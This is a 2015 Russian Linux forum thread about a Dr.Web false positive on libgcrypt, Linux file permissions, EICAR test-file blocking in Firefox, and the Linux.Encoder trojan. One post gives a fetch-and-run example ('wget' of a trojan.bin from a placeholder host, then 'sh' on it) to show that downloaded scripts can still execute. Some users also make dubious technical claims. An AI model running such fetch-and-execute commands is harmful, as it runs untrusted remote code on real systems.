О вирусах в Линуксе

Barmalei · Сообщение **Barmalei** » 25 мар 2015, 18:15

Сидел на каком то сайте. Все прочитал. Закрываю браузер и вылетает вот такая шняга.
А говорят нет троянов для Линя. Или это ложняк и смело писать Доктору?

Сообщение **DELTA-79** » 25 мар 2015, 18:18

Одно только название "DrWEB" у меня уже не вызывает доверия: Он уже давно был замечен на том, что "ловил" вирусы для линукса. и даже называл файл, в котором он может храниться, мол если замечена длина больше чем N, значит там вирус, вот только этот файл был обязан быть не меньше длинны N. Вот не помню тот сайт, даже на этом форуме как то обсуждался... К тому же, учитывая местонахождение этого вируса, вы явно работаете под ROOTом

Сообщение **PastorDi** » 25 мар 2015, 18:21

В irc где-то сидели?

Другой бэкдор для Mac OS X — Mac.BackDoor.Tsunami — является адаптированной под архитектуру Apple версией троянца для Linux с названием Linux.BackDoor.Tsunami. Злоумышленники управляют им с использованием протокола IRC (Internet Relay Chat).

Сообщение **VictorR2007** » 25 мар 2015, 18:22

Обычно они на сайтах с порнухой.
Дайте адрес, что-бы нам не нарваться и заранее обходить этот сайт.

Сообщение **PastorDi** » 25 мар 2015, 18:27

Нормальный антивирь Dr.Web.

Barmalei · Сообщение **Barmalei** » 25 мар 2015, 19:15

Напишу им сейчас. Система тю-тю. Буду искать этот файл в карантине.

Сообщение **PastorDi** » 25 мар 2015, 19:17

Barmalei писал(а):Напишу им сейчас. Система тю-тю. Буду искать этот файл в карантине.

Лучше сразу отослать им этот файлик через сайт. Ну и систему бы всю проверить антивирем, малоли где еще он засел.

Barmalei · Сообщение **Barmalei** » 25 мар 2015, 19:30

PastorDi писал(а):
Barmalei писал(а):Напишу им сейчас. Система тю-тю. Буду искать этот файл в карантине.
Лучше сразу отослать им этот файлик через сайт. Ну и систему бы всю проверить антивирем, малоли где еще он засел.

Если еще найду его. Может быть придется вас просить выложить этот файл.

notauser · Сообщение **notauser** » 25 мар 2015, 19:35

Если найдете файл, в чём я сильно сомневаюсь, то на проверку в https://www.virustotal.com/ru/ Да и сравнить с файлом из соответствующего пакета нужно обязательно.

Barmalei · Сообщение **Barmalei** » 25 мар 2015, 19:44

Карантина не нашел. Доктор молчит. Может дадите этот файл мне?

Сообщение **VictorR2007** » 25 мар 2015, 20:03

Barmalei писал(а):Карантина не нашел. Доктор молчит. Может дадите этот файл мне?

Вам его и не найти, судя по сообщению на картинке.
Там нет сообщения, что в карантине.

Сообщение **VictorR2007** » 25 мар 2015, 20:06

А что за антивирус?
Вроде он у вас в режиме демона и постоянной защиты.
Уже много лет не следил за эти софтом.

Barmalei · Сообщение **Barmalei** » 25 мар 2015, 20:06

Ложняк сказали. Но как теперь искать этот файл.

notauser · Сообщение **notauser** » 25 мар 2015, 20:07

Скачайте пакет с файлом из реп, распакуйте и скопируйте файл в /usr/lib64
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.

Barmalei · Сообщение **Barmalei** » 25 мар 2015, 20:08

notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте в /usr/lib64

А подробней можно? где искать репы? я дистр вскрыл ничего не нашел.

notauser · Сообщение **notauser** » 25 мар 2015, 20:22

http://mirror.yandex.ru/rosa/rosa2014.1 ... x86_64.rpm

Barmalei · Сообщение **Barmalei** » 25 мар 2015, 20:23

notauser писал(а):http://mirror.yandex.ru/rosa/rosa2014.1 ... x86_64.rpm

Спасибо. Я рылся так и не нашел.

Сообщение **PastorDi** » 25 мар 2015, 20:25

Barmalei писал(а):
notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте в /usr/lib64
А подробней можно? где искать репы? я дистр вскрыл ничего не нашел.

Проще так будет:

Код: Выделить всё

urpmi --replacepkgs lib64gcrypt20

notauser · Сообщение **notauser** » 25 мар 2015, 20:28

Для этого нужно систему загрузить (хотя бы грамотно chroot) и знать что нужный файл из этого пакета lib64gcrypt20

Barmalei · Сообщение **Barmalei** » 25 мар 2015, 20:42

PastorDi писал(а): Проще так будет:
Код: Выделить всё
urpmi --replacepkgs lib64gcrypt20

Ваш вариант не прошел.

Barmalei · Сообщение **Barmalei** » 25 мар 2015, 20:44

notauser писал(а):Для этого нужно систему загрузить (хотя бы грамотно chroot) и знать что нужный файл из этого пакета lib64gcrypt20

Скопировал, система загрузилась, но доктор съел файл. Сейчас отрубил его и снова скопировал. Все работает.

Всем спасибо. А доктору минус.

notauser · Сообщение **notauser** » 25 мар 2015, 20:47

Barmalei писал(а):
PastorDi писал(а): Проще так будет:
Код: Выделить всё
urpmi --replacepkgs lib64gcrypt20
Ваш вариант не прошел.

Естественно.
libgcrypt это LGPL-библиотека шифрования — библиотека времени выполнения
libgcrypt включает в себя функции шифрования. В ней реализовано множество
важных свободных шифров, хеш-алгоритмов и алгоритмов подписи публичных
ключей:
Arcfour, Blowfish, CAST5, DES, AES, Twofish, Serpent, rfc2268 (rc2), SEED,
Camellia, IDEA, Salsa, CRC, MD4, MD5, RIPE-MD160, SHA-1, SHA-256, SHA-512,
Tiger, Whirlpool, DSA, DSA2, ElGamal, RSA, ECC.

notauser · Сообщение **notauser** » 25 мар 2015, 20:50

notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте файл в /usr/lib64
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.

Barmalei · Сообщение **Barmalei** » 25 мар 2015, 20:57

notauser писал(а):
notauser писал(а):Скачайте пакет с файлом из реп, распакуйте и скопируйте файл в /usr/lib64
PS Удалите антивирь, мой Вам совет. В Linux применяют другие методы защиты.

Я бесплатно тестирую его.
А какие защиты в Линукс?
Фаервол по дефолту. Root пасс и сижу под пассовым юзвером.

Сообщение **PastorDi** » 25 мар 2015, 23:31

Трояны уже вшиты в линукс!

Чё вы так волнуетесь?

Галахов Роман

PastorDi писал(а):Трояны уже вшиты в линукс! Чё вы так волнуетесь?

Неправильный перевод или реально есть такой скрипт? У себя посмотрел тоже есть такое

Так, что это не розыгрыш, а Реальный союз Linux c вирусами - любой антивирус сойдет с ума, лучше их не ставить

Сообщение **keleg** » 26 мар 2015, 13:10

Это реальная фишка с таким названием.
Cisco Secure Desktop aka Cisco Trojan
Возможно, изменим перевод на менее пугательный.

law · Сообщение **law** » 26 мар 2015, 18:39

Галахов Роман писал(а):
PastorDi писал(а):Трояны уже вшиты в линукс! Чё вы так волнуетесь?
Неправильный перевод или реально есть такой скрипт? У себя посмотрел тоже есть такое

Как автор этого перевода уверяю вас, что перевод правильный и такой скрипт (точнее бинарник) реально есть.
Вот такая строка была в оригинале:
"Allow Cisco Secure Desktop &trojan"

Вот такое можно найти к этому описание:
The 'Cisco Secure Desktop' is a bit of a misnomer — it works by downloading a trojan binary from the server and running it on your client machine to perform some kind of 'verification' and post its approval back to the server.

Таким образом, трояны не вшиты в Linux, но если кому-то сильно хочется (без этого нельзя подключиться к Cisco Secure Desktop), то они поддерживаются.

slavyanix · Сообщение **slavyanix** » 26 мар 2015, 19:31

заговорили о троянах в линукс и почему то все забыли о самой сильной защите линукса от вирусов - это права доступа. попробуйте скачать файл , любой бинарь под линь и глянуть что у него там в правах стоит.)) уверяю о антивирусах забудете сразу.)))

notauser · Сообщение **notauser** » 26 мар 2015, 19:39

suid (setuid setgid)
Весь вопрос в механизмах распространения.

slavyanix · Сообщение **slavyanix** » 26 мар 2015, 19:53

setgid и прочие уже второстепенны и отражают только внутреннюю безопасность в системе. за ними безусловно нужен глаз да глаз, но первичные права на запуск говорят обо всем. любой файл скачанный из сети не имеет прав на запуск. можете проверить. а setuid и setgid говорят о правх запуска программы из директории. для того что бы ими воспользоваться у программы ещё должны быть права на запуск вообще.)) а их нет. и только получив права на запуск можно дкмать о повышении привилегий запуска с помощью setgid.)) вот так и построена защита линукса. есть только одна проблема - дыры в запущенных программах, но их еще нужно суметь проэксплуатировать)) а это уже взлом системы практически вручную, а не вирус. к тому же ту еще много преград.

notauser · Сообщение **notauser** » 26 мар 2015, 19:58

> любой файл скачанный из сети не имеет прав на запуск
Вы точно это знаете? В смысле это не зависит от файловой системы и опций её монтирования?

slavyanix · Сообщение **slavyanix** » 26 мар 2015, 20:02

я работаю с ext системами и как поведет себя btrfs и прочие не знаю. экспериментов не ставил. но можно будет проверить.)) а с ext системами такая защита присутствует очень давно. я застал использование еще ext2)) а вот в других не было необходимости, так что полагаю тут нужно проверять на практике.

notauser · Сообщение **notauser** » 26 мар 2015, 20:21

Ух ты. Ну если Вы ещё застали и перипетии с ELF, то

зачем Вы всё это так непонятно пишите?

slavyanix · Сообщение **slavyanix** » 26 мар 2015, 20:35

ну мне было лет 18)) а любопытен я был чрезмерно.)) так что да поначалу промышлял для удовольствия изучением операционных систем и поиска их слабых мест.)) и на тот момент нормальной альтернативы ext в линуксе и не было. и да были elf файлы. потом от них избавились, точнее перешли на другое. там и правда был гемор, но ничего страшного, только для тех кто не смог обеспечить нормального доступа к ним. и да до сих пор из-за прав доступа линукс можно отстроить как непробиваемую стену. но кто этим ща занимается. но многое по умолчанию сделано вполне грамотно. потом у меня как то запал иссяк и я уже не так ковырял сиистему, да и фс появились в избытке с вполне нормальной работой в линксе. впрочем я до сих пор не ощущаю необходимости в других фс. ext вполне на уровне. обычному пользователю не имеет смысла искать что то еще. это скорее удел профи админов под конкретный сервак.))

Barmalei · Сообщение **Barmalei** » 26 мар 2015, 20:57

slavyanix писал(а):setgid и прочие уже второстепенны и отражают только внутреннюю безопасность в системе. за ними безусловно нужен глаз да глаз, но первичные права на запуск говорят обо всем. любой файл скачанный из сети не имеет прав на запуск. можете проверить. а setuid и setgid говорят о правх запуска программы из директории. для того что бы ими воспользоваться у программы ещё должны быть права на запуск вообще.)) а их нет. и только получив права на запуск можно дкмать о повышении привилегий запуска с помощью setgid.)) вот так и построена защита линукса. есть только одна проблема - дыры в запущенных программах, но их еще нужно суметь проэксплуатировать)) а это уже взлом системы практически вручную, а не вирус. к тому же ту еще много преград.

понятно. но я решил для Вынь качать и проверять проги на Линь. Для Вынь будет безопасней.
сегодня тока на почту якобы от банка пришел баланс в exe файле. отправил сразу в вирлаб, подозреваю что там шифровальщик был.

slavyanix · Сообщение **slavyanix** » 26 мар 2015, 21:05

да экзешник лучше проверить.

notauser · Сообщение **notauser** » 26 мар 2015, 21:34

> но я решил для Вынь качать и проверять проги на Линь
Несмотря на жаргон, я понял что вы хотели сказать. Так и ставте соответствующие решения. А не антивирус для домохозяйки у которой вдруг Linux. Расчет простой: Вот вам анивирь - купите. Не нужен, говорят безопасная система - так в ней вирус - долой - не работает - так был вирус - какой - плохой - все пропало, но мы вас спасли - купите Windows - так в ней вирус - долой - работает. +1 клиент. Barmalei , Вы проверьте на https://www.virustotal.com/ru/ Думаю там dr промолчит.

slavyanix · Сообщение **slavyanix** » 26 мар 2015, 21:40

ну думаю проверять вирусы для вынь на линуксе неплохая идея, но антивирь тогда нужен нормальный. и тут надо озадачится вопросом что в линь лучше проверяет на вирусы. не обязательно же платные антивири будут лучше. уверен есть хорошие бесплатные аналоги. в любом случае улучшего антивиря процент отлова где то 97-98%. увы 2% что проскочит.

notauser · Сообщение **notauser** » 26 мар 2015, 21:50

>Так и ставте соответствующие решения
> ну думаю проверять вирусы для вынь на линуксе неплохая идея, но антивирь тогда нужен нормальный.
Вендоры предлагают линейку решений - для шлюза, почтового сервера, etc и используют в них, в смысле решениях, "Linux-технологии". И это работает. Но защищает пользователей Windows.

notauser · Сообщение **notauser** » 26 мар 2015, 22:59

>Вы проверьте на https://www.virustotal.com/ru/ Думаю там dr промолчит.
Сам отправил.
SHA256: 916ab9e74cc478a14bc80bf5557df9a851667a6876ab9c071cac678ffce0c0a0
Имя файла: libgcrypt.so.20.0.1
Показатель выявления: 0 / 57
Дата анализа: 2015-03-26 19:57:07 UTC (0 минут назад)
Делайте выводы. А лучше спросите напрямую почему такой результат при сигнатурном анализе. И пусть не говорят про что-то другое в Linux.

notauser · Сообщение **notauser** » 26 мар 2015, 23:08

PastorDi писал(а):Трояны уже вшиты в линукс! Чё вы так волнуетесь?

Linux == вирус

Сообщение **keleg** » 27 мар 2015, 02:51

Линукс - распределенный многопользовательский кооперативный конструктор с элементами квеста, а никакой не вирус!

Yamah · Сообщение **Yamah** » 31 мар 2015, 06:01

slavyanix писал(а):любой файл скачанный из сети не имеет прав на запуск. можете проверить. а setuid и setgid говорят о правх запуска программы из директории. для того что бы ими воспользоваться у программы ещё должны быть права на запуск вообще.)) а их нет. и только получив права на запуск можно дкмать о повышении привилегий запуска с помощью setgid.)).

Код: Выделить всё

cd
wget -c http://somebody.com/trojan.bin
sh ~/trojan.bin

Главное убедить программу, занесшую trojan.bin на ПК выполнить последнюю команду.

Yamah · Сообщение **Yamah** » 31 мар 2015, 06:11

Barmalei писал(а):но я решил для Вынь качать и проверять проги на Линь. Для Вынь будет безопасней.

Единственный еще рабочий виндовый антивирус в организации у нас ClamWin с мордашкой к нему. Нужен больше для успокоения пользователей, чем реальная помощь админу. В Cydwin еще и ClamAV есть.
Для проверки небольших программ есть ВирусТоталь, для больших - оффсайт и ClamAV под RELS.

viktor · Сообщение **viktor** » 31 мар 2015, 12:35

> sh ~/trojan.bin
Это вроде как для скриптов вне зависимости от бита "исполняемый"

БольшойКомпьютер

Извините за оффтоп, и спасибо за хорошее настроение к вечеру!))

slavyanix · Сообщение **slavyanix** » 31 мар 2015, 21:54

viktor писал(а):> sh ~/trojan.bin
Это вроде как для скриптов вне зависимости от бита "исполняемый"

попробуй запустить?)) вот там и посмотрим))) зачек исполняемый или нет не играет роли пока прав на запуск нет. или ты нашел дыру?))

Yamah · Сообщение **Yamah** » 01 апр 2015, 05:52

slavyanix писал(а): попробуй запустить?)) вот там и посмотрим))) зачек исполняемый или нет не играет роли пока прав на запуск нет. или ты нашел дыру?))

Со скриптами проканывает.

Код: Выделить всё

ls -l
итого 4
-rw-rw-r-- 1 yamah yamah 303 апр  1 08:47 autoiconv.sh
[yamah@admin Tools]$ sh autoiconv.sh
True

С бинарями нет.
Но напакостить и скриптами можно. В том числе и разрешить исполнение.

viktor · Сообщение **viktor** » 01 апр 2015, 07:29

slavyanix писал(а):
viktor писал(а):> sh ~/trojan.bin
Это вроде как для скриптов вне зависимости от бита "исполняемый"
попробуй запустить?)) вот там и посмотрим))) зачек исполняемый или нет не играет роли пока прав на запуск нет. или ты нашел дыру?))

Сам попробуй. Я знаю.
Вот содержимое файла дла опытов, например
#! /bin/bash
zenity --question --text "`ls`"

Barmalei · Сообщение **Barmalei** » 08 май 2015, 16:21

Ммм, интересно в браузере антивирус есть? Кто блокирует так на подлете еще? DrWeb точно не умеет.

Сообщение **PastorDi** » 08 май 2015, 16:55

Вот: http://rusnovosti.ucoz.com/publ/interne ... ar/4-1-0-6
У Вэбера нету разве плагина к FF ?
И насколько я знаю, Вэбер в фоновом режиме вашу сеть мониторит. Так что... все нормально.

Barmalei · Сообщение **Barmalei** » 08 май 2015, 17:16

PastorDi писал(а):Вот: http://rusnovosti.ucoz.com/publ/interne ... ar/4-1-0-6
У Вэбера нету разве плагина к FF ?
И насколько я знаю, Вэбер в фоновом режиме вашу сеть мониторит. Так что... все нормально.

Я вырубал его и се равно кто- то блочит. Потом как нить еще удалю совсем и проверю. Обычно выскакивает окно Сохранить скачанное, жмешь скачать и файл в карантин падает. Тут блочит и не качает просто и это я думаю на уровне браузера.

Галахов Роман

Barmalei писал(а):Я вырубал его и се равно кто- то блочит. Потом как нить еще удалю совсем и проверю. Обычно выскакивает окно Сохранить скачанное, жмешь скачать и файл в карантин падает. Тут блочит и не качает просто и это я думаю на уровне браузера.

Какие плагины для FF установлены? И можно ссылку на страницу с этими файлами? Антивирусами не пользуюсь. Интересно проверить

Barmalei · Сообщение **Barmalei** » 08 май 2015, 22:33

Галахов Роман писал(а):
Barmalei писал(а):Я вырубал его и се равно кто- то блочит. Потом как нить еще удалю совсем и проверю. Обычно выскакивает окно Сохранить скачанное, жмешь скачать и файл в карантин падает. Тут блочит и не качает просто и это я думаю на уровне браузера.
Какие плагины для FF установлены? И можно ссылку на страницу с этими файлами? Антивирусами не пользуюсь. Интересно проверить

Это тестовый для проверки антивирусов. Он и для Андроида есть. На этой странице внизу http://www.eicar.org/85-0-Download.html
Блокируются только те которые про http, по https скачиваются.
Плагинов вроде бы никаких антивирусных нет, только медийные.

Галахов Роман

Barmalei писал(а):Это тестовый для проверки антивирусов. Он и для Андроида есть. На этой странице внизу http://www.eicar.org/85-0-Download.html
Блокируются только те которые про http, по https скачиваются.
Плагинов вроде бы никаких антивирусных нет, только медийные.

Скачал все 8 файлов без проблем

Думайте...

Barmalei · Сообщение **Barmalei** » 08 май 2015, 23:10

Ладно. Скоро снесу DrWeb и проверю.

Сообщение **PastorDi** » 08 май 2015, 23:22

Barmalei писал(а):Ладно. Скоро снесу DrWeb и проверю.

На сколько я знаю, Dr.Web в Винде ставит свою "прослойку" на сетевом уровне, между выходом пакетов в сеть и winsok.Winsok в Винде последняя/первая инстанция через которую все пакеты идут в/из сети. По этому он все грубо говоря снифит. Может и в линуксе он тоже так же работает. А https трафик он не расшифровывает. По этому через https все скачивается. Значит отлично Dr.Web работает! Радуйтесь!

Barmalei · Сообщение **Barmalei** » 09 май 2015, 10:04

PastorDi писал(а):
Barmalei писал(а):Ладно. Скоро снесу DrWeb и проверю.
На сколько я знаю, Dr.Web в Винде ставит свою "прослойку" на сетевом уровне, между выходом пакетов в сеть и winsok.Winsok в Винде последняя/первая инстанция через которую все пакеты идут в/из сети. По этому он все грубо говоря снифит. Может и в линуксе он тоже так же работает. А https трафик он не расшифровывает. По этому через https все скачивается. Значит отлично Dr.Web работает! Радуйтесь!

Удалил DrWeb. Кто то дальше блокирует.

Галахов Роман

Barmalei писал(а):Удалил DrWeb. Кто то дальше блокирует.

Думаю, все-таки FF работает. Видимо, какой-то плагин. Можете сделать скрин страницы с плагинами, как я, чтобы сравнить? Если я установлю плагины, которых у меня нет, а у вас есть - будет ли блокировка?

*d0s · Сообщение *d0s » 09 май 2015, 11:21

Barmalei писал(а):
notauser писал(а):http://mirror.yandex.ru/rosa/rosa2014.1 ... x86_64.rpm
Спасибо. Я рылся так и не нашел.

Код: Выделить всё

$ urpmf libgcrypt.so.20.0.1
lib64gcrypt20:/usr/lib64/libgcrypt.so.20.0.1
libgcrypt20:/usr/lib/libgcrypt.so.20.0.1

$ urpmq --sources lib64gcrypt20
http://mirror.rosalab.ru/rosa/rosa2014.1/repository/x86_64/media/main/release/lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm

$ urpmq --sources libgcrypt20
http://mirror.rosalab.ru/rosa/rosa2014.1/repository/i586/media/main/release/libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm

$ wget http://mirror.rosalab.ru/rosa/rosa2014.1/repository/x86_64/media/main/release/lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm http://mirror.rosalab.ru/rosa/rosa2014.1/repository/i586/media/main/release/libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm

$ ark -d lib64gcrypt20-1.6.1-2-rosa2014.1.x86_64.rpm
$ ark -d libgcrypt20-1.6.1-2-rosa2014.1.i586.rpm

*d0s · Сообщение *d0s » 09 май 2015, 12:27

ClamAV интересно себя ведет. Ранее на многих дистрибутивах в основном ругался на man & ruby, когда была версия 0.94/0.95.
Теперь когда 0.96/0.97 ругается на это (см. вложение)

Barmalei · Сообщение **Barmalei** » 09 май 2015, 22:11

Галахов Роман писал(а):
Barmalei писал(а):Удалил DrWeb. Кто то дальше блокирует.
Думаю, все-таки FF работает. Видимо, какой-то плагин. Можете сделать скрин страницы с плагинами, как я, чтобы сравнить? Если я установлю плагины, которых у меня нет, а у вас есть - будет ли блокировка?

Только мультимедиа.

Галахов Роман

Barmalei писал(а):Только мультимедиа.

Странно... Установил ваши расширения:

И снова все скачал...
Брандмауэр/Firewoll включен?
Через другие браузеры (хромиум, опера...) - пробовали?

Barmalei · Сообщение **Barmalei** » 09 май 2015, 23:16

Галахов Роман писал(а):
Barmalei писал(а):Только мультимедиа.
Странно... Установил ваши расширения:
пкйц6.png
И снова все скачал...
Брандмауэр/Firewoll включен?
Через другие браузеры (хромиум, опера...) - пробовали?

Брандмауэр/Firewoll не трогал, все по дефолту как установил. Других браузеров не имею.
Фиг с ним. Пусть блокириует. Это все таки +.

Barmalei · Сообщение **Barmalei** » 09 май 2015, 23:27

Нашел кто блокирует этот файл. Вот он в самом браузере.

Галахов Роман

Этот пункт у меня всегда включен, но это не помешало скачать те файлы.

Barmalei · Сообщение **Barmalei** » 11 май 2015, 09:10

Галахов Роман писал(а):Этот пункт у меня всегда включен, но это не помешало скачать те файлы.

Я его выключил и скачал, с ним блокирует.

Галахов Роман

Barmalei писал(а):Я его выключил и скачал, с ним блокирует.

Очень странно... При одних и тех же настройках FF срабатывает по разному...

*d0s · Сообщение *d0s » 11 май 2015, 17:09

Barmalei писал(а):
Галахов Роман писал(а):Этот пункт у меня всегда включен, но это не помешало скачать те файлы.
Я его выключил и скачал, с ним блокирует.

А что в справка - информация для решения проблем

Сообщение **PastorDi** » 11 май 2015, 18:30

Галахов Роман писал(а):
Barmalei писал(а):Я его выключил и скачал, с ним блокирует.
Очень странно... При одних и тех же настройках FF срабатывает по разному...

Да, странно что-то.
У меня подозрения, что Dr.Web просто не корректно удалился. Где-то Dr.web "прослойка" все же осталась.

Barmalei · Сообщение **Barmalei** » 11 май 2015, 18:58

PastorDi писал(а):
Галахов Роман писал(а): Очень странно... При одних и тех же настройках FF срабатывает по разному...
Да, странно что-то.
У меня подозрения, что Dr.Web просто не корректно удалился. Где-то Dr.web "прослойка" все же осталась.

Прослойка Доктора не блокирует, а ловит и ложит в карантин.
Врядли она осталась. Специально проверил, поиск по drweb дал 0 результат.

Сообщение **PastorDi** » 11 май 2015, 19:08

Barmalei писал(а):
PastorDi писал(а): Да, странно что-то.
У меня подозрения, что Dr.Web просто не корректно удалился. Где-то Dr.web "прослойка" все же осталась.
Прослойка Доктора не блокирует, а ловит и ложит в карантин.
Врядли она осталась. Специально проверил, поиск по drweb дал 0 результат.

Не

по слову "drweb" ничего не найдете. Он при установке навреняка либу свою утановил, и где-то прописал на транспортном уровне. При удалении, вы просто внешнюю граф.часть удалили да и все. А эта либа где-то "сидит".
На Винде я наблюдал таку штуку (давно), когда Dr.Web ставится, он подменяет winsok.dll на свой. (видимо пропатченый для слежения иперехвата). Но это давно было. Хотя, может такую же технологию они до сих пор используют. И на линуксе тоже, весь все либы сетевые в открытом доступе.
Можно посоветовать что? Переустановить сетевые пакеты, типа urpmi --replacepkg <пакет>. Тогда с реп, переставятся либы сетевые в чистом виде. И все будет в нормальном режиме работать.

Barmalei · Сообщение **Barmalei** » 11 май 2015, 19:23

Нет никакой прослойки у DrWeb которая блокирует прямо в браузере. Там стоит антивирус и ловит во время скачивания.
Больше я спорить не буду. Это все делает FF, потому что антивирус точно к этому пункту в FF не прилепят они. А почему у вас не робит я не знаю.
Все о защите в FF https://support.mozilla.org/ru/kb/kak-r ... ta-ot-vred

*d0s · Сообщение *d0s » 11 май 2015, 19:26

Может где-то запись имеется как по этому сценарию http://forum.rosalab.ru/viewtopic.php?f=53&t=5569
Например тут - /etc/ld.so

ans · Сообщение **ans** » 01 дек 2015, 12:05

Троян Linux.Encoder заразил около 2000 сайтов
Компания «Доктор Веб» в четверг сообщила новые подробности о троянце, получившем наименование Linux.Encoder.1, о котором впервые сообщалось в начале ноября.
http://news.softodrom.ru/ap/b23592.shtml

Delles · Сообщение **Delles** » 01 дек 2015, 14:31

ans писал(а):новые подробности

«Получив несанкционированный доступ к сайту, киберпреступники размещали на нем...»

М.б. не допускать несанкционированный доступ к сайту?

notauser · Сообщение **notauser** » 01 дек 2015, 15:07

ans писал(а):Троян Linux.Encoder заразил около 2000 сайтов
Компания «Доктор Веб» в четверг сообщила новые подробности о троянце, получившем наименование Linux.Encoder.1, о котором впервые сообщалось в начале ноября.
http://news.softodrom.ru/ap/b23592.shtml

12 ноября 2015 года
Ранее (9) bitdefender http://labs.bitdefender.com/2015/11/lin ... ption-key/ утер "доктора", предлагая расшифровщик бесплатно всем желающим. "Доктор" сделал выводы, и сообщил буквально "сохраняется вероятность того, что злоумышленники со временем могут модифицировать используемые ими алгоритмы шифрования, устранив все «слабые места». Поэтому серьезная опасность потерять важные файлы сохраняется даже для пользователей такой относительно безопасной ОС, как Linux, и в первую очередь — для администраторов веб-сайтов, работающих под управлением популярных систем управления контентом. Напоминаем, что сигнатура Linux.Encoder.1 добавлена в базы Антивируса Dr.Web для Linux. Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации." http://news.drweb.ru/show/?i=9699&c=5&lng=ru&p=0
Делайте выводы.

slavyanix · Сообщение **slavyanix** » 01 дек 2015, 15:22

Со скриптами проканывает.

Код: Выделить всё

ls -l
итого 4
-rw-rw-r-- 1 yamah yamah 303 апр  1 08:47 autoiconv.sh
[yamah@admin Tools]$ sh autoiconv.sh
True

С бинарями нет.
Но напакостить и скриптами можно. В том числе и разрешить исполнение.[/quote]
это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))

notauser · Сообщение **notauser** » 01 дек 2015, 15:55

slavyanix писал(а): это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))

https://ru.wikipedia.org/wiki/Bashdoor

slavyanix · Сообщение **slavyanix** » 01 дек 2015, 16:00

ты мне поясни как ты собрался автоматом после скачки его запустить_)) браузер не запустит а скачкой в консоли редко кто занимается. и тогда надо создавать последовательность команд, хотя бы в одной строке.

Xakep · Сообщение **Xakep** » 01 дек 2015, 16:09

Сейчас проверил файл который упоминается в шапке темы через VirusTotal.
И тут DrWeb обложался на фоне всех остальных антивирусов...

notauser · Сообщение **notauser** » 01 дек 2015, 16:33

Что то это за файл знаете? Компания «Доктор Веб», Linux.Encoder.1. Ну, вы поняли

Barmalei · Сообщение **Barmalei** » 01 дек 2015, 16:37

Xakep писал(а):Сейчас проверил файл который упоминается в шапке темы через VirusTotal.
И тут DrWeb обложался на фоне всех остальных антивирусов...

картинка13.jpeg

На Вирустотал факторов много, не один DrWeb виноват. У меня пролетели все мигом.

notauser · Сообщение **notauser** » 01 дек 2015, 16:47

"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."

Алзим · Сообщение **Алзим** » 01 дек 2015, 16:57

notauser писал(а):"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."

Вы забыли слово «специалисты» добавить в кавычки. Эти «специалисты» даже не смогли создать нормальный вирус ради того, чтобы пиарить свою антивируску сделанную под Линукс. Над «Доктор Вебер» наверное уже весь интернет смеётся над их бездарностью.

Barmalei · Сообщение **Barmalei** » 01 дек 2015, 17:00

Алзим писал(а):
notauser писал(а):"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."
Вы забыли слово «специалисты» добавить в кавычки. Эти «специалисты» даже не смогли создать нормальный вирус ради того, чтобы пиарить свою антивируску сделанную под Линукс. Над «Доктор Вебер» наверное уже весь интернет смеётся над их бездарностью.

Вы в этом уверенны? Я много повидал антивирусов и вирусов и Доктор меньше всех пропустил.
Меня больше удивляет что есть люди тратящие деньги на всякие развлекательные ресурсы и не в малых количествах, а на защиту 500 рэ в год жаба душит.
Они сначала файлы зашифруют, а потом пишут, если я куплю лицуху вы поможете расшифровать?

Алзим · Сообщение **Алзим** » 01 дек 2015, 17:07

Barmalei писал(а): Вы в этом уверенны? Я много повидал антивирусов и вирусов и Доктор меньше всех пропустил.
Меня больше удивляет что есть люди тратящие деньги на всякие развлекательные ресурсы и не в малых количествах, а на защиту 500 рэ в год жаба душит.
Они сначала файлы зашифруют, а потом пишут, если я куплю лицуху вы поможете расшифровать?

Я уверен в том, что Касперский, хоть он и паранойк и ресурсы системы потребляет, но вирусу ловить способен. А Вебер, ну если только какие-нибудь сделанные студентами-первокурсниками или ими самими.

Barmalei · Сообщение **Barmalei** » 01 дек 2015, 17:09

Алзим писал(а):
Barmalei писал(а): Вы в этом уверенны? Я много повидал антивирусов и вирусов и Доктор меньше всех пропустил.
Меня больше удивляет что есть люди тратящие деньги на всякие развлекательные ресурсы и не в малых количествах, а на защиту 500 рэ в год жаба душит.
Они сначала файлы зашифруют, а потом пишут, если я куплю лицуху вы поможете расшифровать?
Я уверен в том, что Касперский, хоть он и паранойк и ресурсы системы потребляет, но вирусу ловить способен. А Вебер, ну если только какие-нибудь сделанные студентами-первокурсниками или ими самими.

Вычищал после Касперского я неделю назад.
На вынь у меня уже 7 лет стоит DrWeb. Копм всегда чистый при том что ребенок все время читы ищет.
Скорее тут прокладка виновата как писали выше. Я Доктора запаролил и ребенок не в состоянии дать ему на одобрение.

notauser · Сообщение **notauser** » 01 дек 2015, 17:16

slavyanix писал(а):ты мне поясни как ты собрался автоматом после скачки его запустить_)) браузер не запустит а скачкой в консоли редко кто занимается. и тогда надо создавать последовательность команд, хотя бы в одной строке.

